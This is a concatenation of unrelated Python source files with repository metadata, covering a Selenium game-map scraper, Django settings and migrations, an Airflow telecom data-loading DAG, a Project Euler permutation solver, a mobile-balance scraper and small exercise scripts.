print ('='*43)
print ('-Aumento de 20 %')
print ('-Salario antigo : R${:.2f}'.format(sal))
print ('-Novo salario é R${:.2f}'.format(nsal1))
elif (sal > 280 ) and ( sal <= 700 ):
nsal2 = ( sal * 1.15 )
print ('='*43)
print ('-Aumento de 15 %')
print ('-Salario antigo : R${:.2f}'.format(sal))
print ('-Novo salario é R${:.2f}'.format(nsal2))
elif (sal > 750 ) and ( sal <= 1500 ):
nsal3 = ( sal * 1.10 )
print ('='*43)
print ('-Aumento de 10 %')
print ('-Salario antigo : R${:.2f}'.format(sal))
print ('-Novo salario é R${:.2f}'.format(nsal3))
elif (sal > 1500 ):
nsal4 = ( sal * 1.5 )
print ('='*43)
print ('-Aumento de 5%')
print ('-Salario antigo : R${:.2f}'.format(sal))
print ('-Novo salario é R${:.2f}'.format(nsal4))
|
[
"joao.vitor.pires.060@gmail.com"
] |
joao.vitor.pires.060@gmail.com
|
dde80391d1a289f17f39b3d1db3696e9b50a41ec
|
530797702626216b6aebc8fa5b55fc0cb494ad3e
|
/cryptid/cryptid_maps_generator.py
|
684018146052a3fe0e77e6788d3135746871f012
|
[] |
no_license
|
trung-hn/fun-stuffs
|
fbe3951bad6a12a5c703892268f0422640aa2232
|
afadd2788e8eeff256e47a2c6a23ee6089bd2595
|
refs/heads/master
| 2023-08-31T20:55:28.662905
| 2023-08-29T20:38:54
| 2023-08-29T20:38:54
| 203,461,969
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,782
|
py
|
#%%
import base64
import json
from selenium import webdriver
from pathlib import Path
from selenium.webdriver.support.ui import Select
from selenium.webdriver.common.by import By
import time
DRIVER_PATH = "D:\Workspace\sandbox\chromedriver.exe"
driver = webdriver.Chrome(executable_path=DRIVER_PATH)
driver.get("https://ospreypublishing.com/playcryptid/")
#%%
def download_map_to_path(driver, path):
# Save Image
canvas = driver.find_element(by=By.XPATH, value="//*[@id='mapCanvas']")
# get the canvas as a PNG base64 string
canvas_base64 = driver.execute_script(
"return arguments[0].toDataURL('image/png').substring(21);", canvas
)
# decode
canvas_png = base64.b64decode(canvas_base64)
Path(path.rsplit("/", 1)[0]).mkdir(parents=True, exist_ok=True)
with open(path, "wb") as f:
f.write(canvas_png)
def save_clues_to_path(path, clues):
Path(path.rsplit("/", 1)[0]).mkdir(parents=True, exist_ok=True)
with open(path, "w") as f:
json.dump(clues, f)
def save_text_to_path(path, clue):
Path(path.rsplit("/", 1)[0]).mkdir(parents=True, exist_ok=True)
with open(path, "w") as f:
f.write(clue)
def save_clues_for_each_player(driver, folder, player_no):
clues = {}
for player in range(1, player_no + 1):
driver.find_element(by=By.XPATH, value="//*[@id='clueButton']").click()
time.sleep(1)
clue = driver.find_element(by=By.XPATH, value="//*[@id='clueText']")
clues[f"Player {player}:"] = clue.text
save_text_to_path(
folder + f"player {player} clue.txt",
clue.text,
)
driver.find_element(by=By.XPATH, value="//*[@id='clueButton']").click()
time.sleep(0.6)
save_clues_to_path(folder + "clues.json", clues)
return clues
# %%
visited = set()
drop_down = Select(driver.find_element(by=By.XPATH, value="//*[@id='ngfPlayers']"))
for order in range(1, 101):
for player_no in (2, 3, 4, 5):
drop_down.select_by_value(str(player_no))
time.sleep(0.5)
# Start Game
driver.find_element(by=By.XPATH, value="//*[@id='ngfStart']").click()
time.sleep(0.1)
try:
driver.find_element(
by=By.XPATH, value='//button[normalize-space()="OK"]'
).click()
except:
pass
time.sleep(0.5)
folder = f"data/Advance {player_no} players/Game {order}/"
download_map_to_path(driver, folder + "map.png")
# Save clues for each player
clues = save_clues_for_each_player(driver, folder, player_no)
jsonified_clues = json.dumps(clues)
if jsonified_clues in visited:
print(f"{order} already visited")
continue
visited.add(jsonified_clues)
# Get hint
time.sleep(1)
driver.find_element(
by=By.XPATH, value='//button[normalize-space()="Reveal Hint"]'
).click()
time.sleep(0.1)
driver.find_element(value="hint_confirm_yes").click()
time.sleep(0.4)
hint = driver.find_element(by=By.XPATH, value="//*[@id='hintText']")
save_text_to_path(folder + "hint.txt", hint.text)
# Get solution
driver.find_element(value="targetButton").click()
time.sleep(0.1)
driver.find_element(value="target_confirm_yes").click()
time.sleep(1)
download_map_to_path(driver, folder + "solution/solution.png")
# Quit
driver.find_element(by=By.XPATH, value="//*[@id='quitButton']").click()
time.sleep(0.4)
try:
driver.find_element(
by=By.XPATH, value="//*[@id='quit_confirm_yes']"
).click()
except:
pass
time.sleep(0.5)
# %%
|
[
"trung.nang.hoang@gmail.com"
] |
trung.nang.hoang@gmail.com
|
0f43d2c8b893f082d38427beb7a50cfa5047b97d
|
f60eb7d15ce3ca06e2db1dc0af8b3b87bed08c37
|
/home/migrations/0026_auto_20170613_1726.py
|
c701f4e2b1b402be2ac5c422cd43ebada3d8feb6
|
[] |
no_license
|
wlminimal/epc
|
96136f0c5f2b4ddc04fbc7e7b76d6a41c631ea26
|
2127a4e273a69a3ca0d5711fd1452c1bc5ab7590
|
refs/heads/master
| 2022-12-12T11:33:57.711869
| 2019-04-12T16:33:58
| 2019-04-12T16:33:58
| 92,700,181
| 0
| 0
| null | 2022-12-07T23:58:05
| 2017-05-29T02:20:33
|
Python
|
UTF-8
|
Python
| false
| false
| 496
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.7 on 2017-06-13 17:26
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('home', '0025_auto_20170613_1721'),
]
operations = [
migrations.AlterField(
model_name='homepage',
name='service_button_text',
field=models.CharField(default='See more Service info', max_length=50),
),
]
|
[
"wlminimal@gmail.com"
] |
wlminimal@gmail.com
|
d35824f9c7bc1d9b5bdf9ab1821580ea4c94cc6e
|
3d9640bf3fb1da00f2739424723fbf6d74b574c0
|
/project/accounts/migrations/0002_auto_20200809_1536.py
|
9bb3a316cc8f71e82a6646748c93e6a9df7fbec6
|
[] |
no_license
|
brahim024/django-user-auth
|
265df0de18bdce4756c53c616ba097755175b519
|
41339d449f6d2abb07ab30e087234915ada59186
|
refs/heads/master
| 2022-12-22T06:13:02.973405
| 2020-09-26T00:08:58
| 2020-09-26T00:08:58
| 279,684,766
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 397
|
py
|
# Generated by Django 3.1 on 2020-08-09 13:36
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('accounts', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='profile',
name='phone',
field=models.CharField(blank=True, max_length=20, null=True),
),
]
|
[
"ifninos168@gmail.com"
] |
ifninos168@gmail.com
|
bba7005497f25a02a0b5b5133051bdc931a6245d
|
64327166debec734cdbdceed673affc7ef806901
|
/backend/test_expo_app_23831/settings.py
|
267df1ccc5565082c44b00a4f948a140ec41ff5d
|
[] |
no_license
|
crowdbotics-apps/test-expo-app-23831
|
85aa164045a6d6988b4507ecb316d72a1482db74
|
67c0d3990ecc85359f9897676d58dad00bcdd3e7
|
refs/heads/master
| 2023-02-16T00:18:19.859203
| 2021-01-14T00:33:41
| 2021-01-14T00:33:41
| 329,466,667
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,782
|
py
|
"""
Django settings for test_expo_app_23831 project.
Generated by 'django-admin startproject' using Django 1.11.16.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
import environ
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
env = environ.Env()
environ.Env.read_env(os.path.join(BASE_DIR, '.env'))
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = env.str('SECRET_KEY')
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = env.bool('DEBUG', default=True)
ALLOWED_HOSTS = ['*']
SITE_ID = 1
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.sites'
]
LOCAL_APPS = [
'home',
]
THIRD_PARTY_APPS = [
'rest_framework',
'rest_framework.authtoken',
'bootstrap4',
'allauth',
'allauth.account',
'allauth.socialaccount',
'allauth.socialaccount.providers.google',
]
INSTALLED_APPS += LOCAL_APPS + THIRD_PARTY_APPS
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'whitenoise.middleware.WhiteNoiseMiddleware',
]
ROOT_URLCONF = 'test_expo_app_23831.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates'), ],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'test_expo_app_23831.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': 'test_expo_app_23831',
'USER': 'test_expo_app_23831',
'PASSWORD': 'test_expo_app_23831',
'HOST': 'localhost',
'PORT': '5432',
}
}
if env.str('DATABASE_URL', default=None):
DATABASES = {
'default': env.db()
}
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'staticfiles')
STATICFILES_DIRS = [
os.path.join(BASE_DIR, 'static')
]
STATICFILES_STORAGE = 'whitenoise.storage.CompressedManifestStaticFilesStorage'
AUTHENTICATION_BACKENDS = (
'django.contrib.auth.backends.ModelBackend',
'allauth.account.auth_backends.AuthenticationBackend'
)
# allauth
ACCOUNT_EMAIL_REQUIRED = True
ACCOUNT_AUTHENTICATION_METHOD = 'email'
ACCOUNT_USERNAME_REQUIRED = False
ACCOUNT_EMAIL_VERIFICATION = None
LOGIN_REDIRECT_URL = '/'
if DEBUG:
# output email to console instead of sending
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
EMAIL_HOST = 'smtp.sendgrid.net'
EMAIL_HOST_USER = env.str('SENDGRID_USERNAME', '')
EMAIL_HOST_PASSWORD = env.str('SENDGRID_PASSWORD', '')
EMAIL_PORT = 587
EMAIL_USE_TLS = True
# Import local settings
try:
from .local_settings import *
INSTALLED_APPS += DEBUG_APPS
except:
pass
|
[
"team@crowdbotics.com"
] |
team@crowdbotics.com
|
431e0d44cfd2d2914eee2be9382d559ed9d7fc01
|
4daff90cfce1f253a3d8b14583dc0a038d553ca5
|
/PyMess/MAG/SaveAllDip.py
|
0e4e30b2180fcae15b7a47f17ab897311e2a895b
|
[
"MIT"
] |
permissive
|
mattkjames7/PyMess
|
42d0119a91d130649b3c601889ef132e38facb4f
|
f2c68285a7845a24d98284e20ed4292ed5e58138
|
refs/heads/master
| 2021-06-28T14:43:32.748427
| 2020-10-27T10:27:52
| 2020-10-27T10:27:52
| 174,409,228
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,171
|
py
|
import numpy as np
from ._SaveDip import _SaveDip
from .DataAvailability import DataAvailability
def SaveAllDip(Minute=False,StartI=0,EndI=None):
'''
This procedure should save all magnetometer data rotated into
a coordinate system useful for studying waves, with components in
the poloidal, toroidal and parallel directions.
Inputs:
Minute: Set to True to use minute resolution data, or False for
full time resolution data.
res: Tells the function to resample the MAG data to this time
resolution in seconds.
ModelParams: Parameters to use for the KT17 magnetic field model
When set to None, the values used are calculated based on
Mercury's distance from the Sun.
Ab: Aberration angle in degrees, set to None to calculate
automatically.
DetectGaps: If not None, then the routine will search for gaps
larger than DetectGaps in hours and insert NaNs, gaps
smaller than this are interpolated over.
'''
dates = DataAvailability(Minute,Type='MSO')
nf = np.size(dates)
if EndI is None:
EndI = nf
for i in range(StartI,EndI):
print('Converting File {0} of {1} ({2})'.format(i+1,nf,dates[i]))
_SaveDip(dates[i],Minute)
|
[
"mattkjames7@gmail.com"
] |
mattkjames7@gmail.com
|
6a244720c1ec569ef5ad9d6d031558d08080eddc
|
87f574548a321a668f325bc3d120a45366b0b76b
|
/booking/migrations/0029_auto_20151020_1527.py
|
a7ae5a2639c51692d05636dbc2675c9b1f1421d8
|
[] |
no_license
|
judy2k/pipsevents
|
1d19fb4c07e4a94d285e6b633e6ae013da0d1efd
|
88b6ca7bb64b0bbbbc66d85d2fa9e975b1bd3081
|
refs/heads/master
| 2021-01-14T11:11:26.616532
| 2016-10-07T20:47:39
| 2016-10-07T20:55:13
| 36,600,721
| 0
| 0
| null | 2015-05-31T11:51:14
| 2015-05-31T11:51:14
| null |
UTF-8
|
Python
| false
| false
| 5,457
|
py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import django.utils.timezone
import django_extensions.db.fields
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('booking', '0028_event_cancelled'),
]
operations = [
migrations.CreateModel(
name='Ticket',
fields=[
('id', models.AutoField(serialize=False, verbose_name='ID', primary_key=True, auto_created=True)),
('extra_ticket_info', models.TextField(default='', blank=True)),
('extra_ticket_info1', models.TextField(default='', blank=True)),
],
),
migrations.CreateModel(
name='TicketBooking',
fields=[
('id', models.AutoField(serialize=False, verbose_name='ID', primary_key=True, auto_created=True)),
('date_booked', models.DateTimeField(default=django.utils.timezone.now)),
('date_rebooked', models.DateTimeField(null=True, blank=True)),
('paid', models.BooleanField(default=False)),
('payment_confirmed', models.BooleanField(help_text='Payment confirmed by admin/organiser', default=False)),
('date_payment_confirmed', models.DateTimeField(null=True, blank=True)),
('cancelled', models.BooleanField(default=False)),
('reminder_sent', models.BooleanField(default=False)),
('warning_sent', models.BooleanField(default=False)),
('booking_reference', models.CharField(max_length=255)),
],
),
migrations.CreateModel(
name='TicketedEvent',
fields=[
('id', models.AutoField(serialize=False, verbose_name='ID', primary_key=True, auto_created=True)),
('name', models.CharField(max_length=255)),
('description', models.TextField(default='', blank=True)),
('date', models.DateTimeField()),
('location', models.CharField(max_length=255, default='Watermelon Studio')),
('max_tickets', models.PositiveIntegerField(help_text='Leave blank if no max number', null=True, blank=True)),
('contact_person', models.CharField(max_length=255, default='Gwen Burns')),
('contact_email', models.EmailField(max_length=254, default='thewatermelonstudio@hotmail.com')),
('ticket_cost', models.DecimalField(default=0, decimal_places=2, max_digits=8)),
('advance_payment_required', models.BooleanField(default=True)),
('show_on_site', models.BooleanField(help_text='Tick to show on the site', default=True)),
('payment_open', models.BooleanField(default=True)),
('payment_info', models.TextField(blank=True)),
('payment_due_date', models.DateTimeField(help_text='Tickets that are not paid by the payment due date will be automatically cancelled (a warning email will be sent to users first).', null=True, blank=True)),
('payment_time_allowed', models.PositiveIntegerField(help_text='Number of hours allowed for payment after booking (after this ticket purchases will be cancelled. This will be ignored if there is a payment due date set on the event itself. ', null=True, blank=True)),
('email_studio_when_purchased', models.BooleanField(default=False)),
('max_ticket_purchase', models.PositiveIntegerField(help_text='Limit the number of tickets that can be purchased at one time', null=True, blank=True)),
('extra_ticket_info_label', models.CharField(max_length=255, default='', blank=True)),
('extra_ticket_info_help', models.CharField(help_text='Description/details/help text to display under the extra info field', max_length=255, default='', blank=True)),
('extra_ticket_info_required', models.BooleanField(help_text='Tick if this information is mandatory when booking tickets', default=False)),
('extra_ticket_info1_label', models.CharField(max_length=255, default='', blank=True)),
('extra_ticket_info1_help', models.CharField(help_text='Description/details/help text to display under the extra info field', max_length=255, default='', blank=True)),
('extra_ticket_info1_required', models.BooleanField(help_text='Tick if this information is mandatory when booking tickets', default=False)),
('slug', django_extensions.db.fields.AutoSlugField(max_length=40, unique=True, populate_from='name', blank=True, editable=False)),
],
options={
'ordering': ['-date'],
},
),
migrations.AddField(
model_name='ticketbooking',
name='ticketed_event',
field=models.ForeignKey(related_name='ticket_bookings', to='booking.TicketedEvent'),
),
migrations.AddField(
model_name='ticketbooking',
name='user',
field=models.ForeignKey(to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='ticket',
name='ticket_booking',
field=models.ForeignKey(related_name='tickets', to='booking.TicketBooking'),
),
]
|
[
"rebkwok@gmail.com"
] |
rebkwok@gmail.com
|
3f0fffecb61d68c200b0497141ba08152cbf23ab
|
77b3ef4cae52a60181dfdf34ee594afc7a948925
|
/mediation/dags/cm_sub_dag_import_huawei_2g_files.py
|
65d0e712174d52e4a419c52213345d1decc65dd8
|
[
"Apache-2.0"
] |
permissive
|
chandusekhar/bts-ce
|
4cb6d1734efbda3503cb5fe75f0680c03e4cda15
|
ad546dd06ca3c89d0c96ac8242302f4678ca3ee3
|
refs/heads/master
| 2021-07-15T02:44:27.646683
| 2020-07-26T08:32:33
| 2020-07-26T08:32:33
| 183,961,877
| 0
| 0
|
Apache-2.0
| 2020-07-26T08:32:34
| 2019-04-28T21:42:29
|
Python
|
UTF-8
|
Python
| false
| false
| 2,517
|
py
|
import sys
import os
from airflow.models import DAG
from airflow.operators.bash_operator import BashOperator
from airflow.operators.python_operator import PythonOperator
from airflow.operators.python_operator import BranchPythonOperator
from airflow.operators.dummy_operator import DummyOperator
# sys.path.append('/mediation/packages');
#
# from bts import NetworkBaseLine, Utils, ProcessCMData;
#
# bts_utils = Utils();
def import_huawei_2g_parsed_csv(parent_dag_name, child_dag_name, start_date, schedule_interval):
"""
Parse huawei 2g cm files.
:param parent_dag_name:
:param child_dag_name:
:param start_date:
:param schedule_interval:
:return:
"""
dag = DAG(
'%s.%s' % (parent_dag_name, child_dag_name),
schedule_interval=schedule_interval,
start_date=start_date,
)
t23 = DummyOperator( task_id='branch_huawei_2g_importer', dag=dag)
import_mml_csv = BashOperator(
task_id='import_huawei_2g_mml_data',
bash_command='python /mediation/bin/load_cm_data_into_db.py huawei_mml_gsm /mediation/data/cm/huawei/parsed/mml_gsm ',
dag=dag)
import_nbi_csv = BashOperator(
task_id='import_huawei_2g_nbi_data',
bash_command='python /mediation/bin/load_cm_data_into_db.py huawei_nbi_gsm /mediation/data/cm/huawei/parsed/nbi_gsm ',
dag=dag)
import_nbi_csv = BashOperator(
task_id='import_huawei_2g_gexport_data',
bash_command='python /mediation/bin/load_cm_data_into_db.py huawei_gexport_gsm /mediation/data/cm/huawei/parsed/gexport_gsm ',
dag=dag)
t_join = DummyOperator(
task_id='join_huawei_2g_importer',
dag=dag,
)
t_run_huawei_gexport_gsm_insert_queries = BashOperator(
task_id='run_huawei_gexport_gsm_insert_queries',
bash_command='python /mediation/bin/run_cm_load_insert_queries.py huawei_gexport_gsm',
dag=dag)
dag.set_dependency('branch_huawei_2g_importer', 'import_huawei_2g_mml_data')
dag.set_dependency('branch_huawei_2g_importer', 'import_huawei_2g_nbi_data')
dag.set_dependency('branch_huawei_2g_importer', 'import_huawei_2g_gexport_data')
dag.set_dependency('import_huawei_2g_gexport_data', 'run_huawei_gexport_gsm_insert_queries')
dag.set_dependency('import_huawei_2g_mml_data', 'join_huawei_2g_importer')
dag.set_dependency('import_huawei_2g_nbi_data', 'join_huawei_2g_importer')
dag.set_dependency('run_huawei_gexport_gsm_insert_queries', 'join_huawei_2g_importer')
return dag
|
[
"emmanuel.ssebaggala@bodastage.com"
] |
emmanuel.ssebaggala@bodastage.com
|
7f1d778988aaa8410b69aaff2a859853bb5d7817
|
97eac4a05c77e1b6898b84c9606afa13428e45df
|
/024_Lexicographic_permutations.py
|
80fe8dd1ef24fad7bc08caf50d061bf609d82710
|
[] |
no_license
|
ryanmcg86/Euler_Answers
|
8f71b93ea15fceeeeb6b661d7401e40b760a38e6
|
28374025448b16aab9ed1dd801aafc3d602f7da8
|
refs/heads/master
| 2022-08-11T13:31:11.038918
| 2022-07-28T00:35:11
| 2022-07-28T00:35:11
| 190,278,288
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,682
|
py
|
'''A permutation is an ordered arrangement of objects.
For example, 3124 is one possible permutation of the digits 1, 2, 3 and 4.
If all of the permutations are listed numerically or alphabetically, we call it lexicographic order.
The lexicographic permutations of 0, 1 and 2 are:
012 021 102 120 201 210
What is the millionth lexicographic permutation of the digits 0, 1, 2, 3, 4, 5, 6, 7, 8 and 9?
Link: https://projecteuler.net/problem=24'''
#Imports
import time
#Build a factorial function
def fact(n):
ans = 1
for i in range(1, n + 1):
ans *= i
return ans
#Build a suffix function
def buildSuffix(num):
suff = 'th'
begin = len(str(num)) - 2
end = begin + 1
suffixes = [[1, 'st'], [2, 'nd'], [3, 'rd']]
if str(num)[begin:end] != '1':
for i in range(0, len(suffixes)):
if int(str(num)[-1]) == suffixes[i][0]
suff = suffixes[i][1]
return suff
#Build a perm function
def perm(n, s):
if len(s) == 1: return s
q, r = divmod(n, fact(len(s) - 1))
return s[q] + perm(r, s[:q] + s[q + 1:])
#Build a lexigraphic permutation function
#that returns the nth lexigraphic permutation
#of a given input of numbers
def lexiPermutation(digits, permCount):
start = time.time()
num = perm(permCount - 1, digits)
suff = buildSuffix(permCount)
permCount = str(permCount) + suff
print 'The ' + permCount + ' lexicographic permutation of the given digits is ' + str(num) + '.'
print 'This took ' + str(time.time() - start) + ' seconds to calculate.'
#Run the program
digits = '0123456789'
permCount = 1000000
lexiPermutation(digits, permCount)
|
[
"noreply@github.com"
] |
ryanmcg86.noreply@github.com
|
a725d5a7921317bce3d96785f012f2976cfb7fb9
|
8b69984781bffb117f4adb5fbff2a75c0b31294f
|
/userinfo/migrations/0001_initial.py
|
00ca6e3e7e58e40c8ac5de8eb3367407d2448966
|
[] |
no_license
|
kkamagwi/childOfChange
|
899c5ee035090f9ab2d176a9d39cd58a48f01d39
|
8041cbfbda75e74ef1ae2470586abf45d4d431e9
|
refs/heads/main
| 2023-07-14T10:21:49.981455
| 2021-08-13T13:44:32
| 2021-08-13T13:44:32
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 594
|
py
|
# Generated by Django 3.2.5 on 2021-07-05 08:45
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='UserContacts',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=30)),
('phone', models.IntegerField()),
('question', models.TextField()),
],
),
]
|
[
"you@example.com"
] |
you@example.com
|
986e36d2846558b181df26b7503d003c0c9797cc
|
f02fe8cd0506695e56570ecbb5be6e28cda55a2e
|
/course_tracker/hu_authz_handler/views.py
|
dadcfb04f4361a45d7dc7c4b3fd37b406983f917
|
[] |
no_license
|
raprasad/Course-Tracker
|
71ec045024d3adc7ef061857696b3751452ce8c6
|
dc5107b923c73fb73bea84dfc2df4c989c7fe231
|
refs/heads/master
| 2021-01-25T08:28:18.743834
| 2014-11-11T15:51:02
| 2014-11-11T15:51:02
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,336
|
py
|
from django.http import HttpResponse, Http404, HttpResponseRedirect
from django.template import RequestContext
from django.shortcuts import render_to_response
from django.core.urlresolvers import reverse
from django.contrib.auth import authenticate, login
from django.contrib.auth import logout
from django.core.mail import send_mail
from hu_authzproxy.authzproxy_login_handler import AuthZProxyLoginHandler
from hu_authzproxy.authz_proxy_validation_info import AuthZProxyValidationInfo
from django.conf import settings
#import logging
#logger = logging.getLogger(__name__)
def view_handle_authz_callback(request):
"""View to handle pin callback
If authentication is succesful:
- go to a specified 'next' link
- or default to the django admin index page
"""
#
if request.GET and request.GET.get('next', None) is not None:
next = request.GET.get('next')
else:
next = reverse('admin:index', args={})
#next = reverse('admin:index', args={})
# How Django handles authentication after pin is verfied.
# See "pin_login_handler.PinLoginHandler" class handler for more info
# This allows anyone with a harvard pin to log in
access_settings = { 'restrict_to_existing_users':True \
, 'restrict_to_active_users':True \
, 'restrict_to_staff':True \
, 'restrict_to_superusers':False}
authz_validation_info = AuthZProxyValidationInfo(request=request\
,app_names=settings.HU_PIN_LOGIN_APP_NAMES\
, gnupghome=settings.GNUPG_HOME
, gpg_passphrase=settings.GPG_PASSPHRASE
, is_debug=settings.DEBUG)
authz_pin_login_handler = AuthZProxyLoginHandler(authz_validation_info\
, **access_settings)
if authz_pin_login_handler.did_login_succeed():
login(request, authz_pin_login_handler.get_user())
return HttpResponseRedirect(next)
# Errors while logging in!
#
# Retrieve error messages from the AuthZProxyLoginHandler
error_messages = []
authz_errs = authz_pin_login_handler.get_err_msgs()
if not authz_errs is None:
error_messages += authz_errs
# Retrieve error flags from the AuthZProxyLoginHandler
err_dict = authz_pin_login_handler.get_error_dict() # get error lookup for use
for k,v in err_dict.iteritems():
if v is True:
error_messages.append(' %s -> [%s]' % (k,v))
print ' %s -> [%s]' % (k,v)
# add the user IP address
error_messages.append('user IP address: %s' % request.META.get('REMOTE_ADDR', None))
# send email message to the admins
try:
admin_emails = map(lambda x: x[1], settings.ADMINS)
except:
admin_emails = None
#print admin_emails
if admin_emails and len(admin_emails) > 0:
send_mail('Course database log in fail info', 'Here is the message. %s' % ('\n'.join(error_messages)), admin_emails[0], admin_emails,fail_silently=False)
# send the error flags to the template
return render_to_response('hu_authz_handler/view_authz_login_failed.html', err_dict, context_instance=RequestContext(request))
|
[
"raman_prasad@harvard.edu"
] |
raman_prasad@harvard.edu
|
6da90b055be7beefd62289bc89d91a7ab8de662d
|
53c157cca69d6ae719cb71d4917ee2f53a10b8e6
|
/mobile_balance/mts.py
|
515a21723e044c6650f8cf528223bc05c1027c56
|
[] |
no_license
|
Ksardos/mobile-balance
|
03fdb072a364dee7f0c470f7069672c7b64ffa61
|
0f13d6be36c58abf401cb382fc85a75542adcdd5
|
refs/heads/master
| 2021-01-15T10:50:47.417407
| 2016-06-07T12:12:13
| 2016-06-07T12:12:13
| 78,822,827
| 0
| 0
| null | 2017-01-13T06:40:07
| 2017-01-13T06:40:07
| null |
UTF-8
|
Python
| false
| false
| 1,516
|
py
|
#!/usr/bin/env python
import requests
import re
from .exceptions import BadResponse
from .utils import check_status_code
def get_balance(number, password):
session = requests.Session()
response = session.get('https://login.mts.ru/amserver/UI/Login')
check_status_code(response, 401)
csrf_token = re.search(r'name="csrf.sign" value="(.*?)"', response.content)
if csrf_token is None:
raise BadResponse('CSRF token not found', response)
csrf_token = csrf_token.group(1)
response = session.post('https://login.mts.ru/amserver/UI/Login?service=lk&goto=https://lk.ssl.mts.ru/',
data={'IDToken1': number,
'IDToken2': password,
'csrf.sign': csrf_token,
},
headers={
'Accept-Language': 'ru,en;q=0.8',
})
check_status_code(response, 200)
response = session.get('https://oauth.mts.ru/webapi-1.4/customers/@me')
check_status_code(response, 200)
data = response.json()
relations = data['genericRelations']
targets = [rel['target'] for rel in relations]
accounts = [target for target in targets if target['@c'] == '.Account']
if not accounts:
raise RuntimeError('Account not found in the data response')
balance = accounts[0].get('balance')
if balance is None:
raise BadResponse('Unable to get balance from JSON', response)
return float(balance)
|
[
"svetlyak.40wt@gmail.com"
] |
svetlyak.40wt@gmail.com
|
a465a6c6bfb2e0461cae260d9295a33bb90d79f2
|
d974256fed39a5583012b17fd9c371121271814b
|
/charpter_04/test/client.py
|
7bf183d5b1b86c1fceee40195c7030cf02fc7bf8
|
[] |
no_license
|
gbkuce/spider-courses
|
18ce88beb120641eae19c01f331ddd53adc4105a
|
3364b651149da600c51ed8d0d93a7e0cb4bc5211
|
refs/heads/master
| 2021-01-20T13:56:31.879419
| 2017-04-08T03:38:35
| 2017-04-08T03:38:35
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 178
|
py
|
import socket
import sys
sock = socket.create_connection(('localhost', 20012))
sock.send('Client Request')
data = sock.recv(1024)
print 'data received: ' + data
sock.close()
|
[
"hezhen112058@pwrd.com"
] |
hezhen112058@pwrd.com
|
b7c5b0a0bd0c73406067db7c8d978a348d299ee3
|
5b188a06f9b615b8a4541074fc50eeb1bfac5d97
|
/链表/reverseKGroup.py
|
82d64ffbfca37579083481a2d75302347af73f4c
|
[] |
no_license
|
yinyinyin123/algorithm
|
3a8cf48a48bd2758c1e156c8f46161fe3697342f
|
b53f030ea3a4e2f6451c18d43336ff9c5d7433af
|
refs/heads/master
| 2021-01-07T20:07:12.544539
| 2020-08-31T05:16:44
| 2020-08-31T05:16:44
| 241,807,608
| 5
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,227
|
py
|
### 2020/06/01
### leetcode 25 K个一组翻转链表
### one code one day
# Definition for singly-linked list.
# class ListNode:
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution:
def reverseKGroup(self, head: ListNode, k: int) -> ListNode:
### 反转链表
def reverse(start, end):
prev = None
pcur = start
